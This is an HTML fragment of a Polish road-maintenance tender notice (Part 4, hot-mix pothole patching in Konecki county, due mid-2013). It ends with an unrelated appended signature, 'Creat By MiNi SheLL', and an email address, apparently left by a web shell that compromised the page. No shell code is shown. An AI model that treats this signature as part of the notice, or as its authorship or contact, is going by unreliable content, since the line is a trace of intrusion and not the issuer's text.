<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Remont cząstkowy nawierzchni w technologii masą bitumiczną wbudowaną na gorąco na terenie wszystkich gmin powiatu koneckiego polegający na sfrezowaniu nawierzchni do profilu, pokryciu ubytku (łaty) połączeniem cienkowarstwowym (emulsją asfaltową) oraz uzupełnieniu ubytku masą mineralno - bitumiczną (warstwa ścieralna dla ruchu KR2) Lokalizacja robót - miejsca wbudowania masy ustalona zostanie z Wykonawcą..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Remont cząstkowy nawierzchni w technologii masą bitumiczną wbudowaną na gorąco na terenie wszystkich gmin powiatu koneckiego polegający na sfrezowaniu nawierzchni do profilu, pokryciu ubytku (łaty) połączeniem cienkowarstwowym (emulsją asfaltową) oraz uzupełnieniu ubytku masą mineralno - bitumiczną (warstwa ścieralna dla ruchu KR2) Lokalizacja robót - miejsca wbudowania masy ustalona zostanie z Wykonawcą.
     Warunki wykonania i odbioru robót zawarte są w załączonej do SIWZ - szczegółowej specyfikacji technicznej D-05.03.25.
     Cena jednostkowa określona w kosztorysie ofertowym będzie stosowana przy wyliczeniu należności Wykonawcy za faktycznie wbudowaną ilość masy. Zamawiający dopuszcza możliwość rozliczenia zrealizowanych i odebranych ilości robót fakturami częściowymi wystawianymi na koniec każdego miesiąca.
     Wykonawca składając ofertę na realizację robót ujętych w CZĘŚCI 4 dysponować musi:
-	otaczarką albo mieć możliwość zakupu masy w okresie przewidzianym na realizację robót, walcem drogowym do zagęszczania masy oraz innym sprzętem wymienionym w SST
          - naprawa zaniżeń, kolein, nierówności 			                   - około 100 Mg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com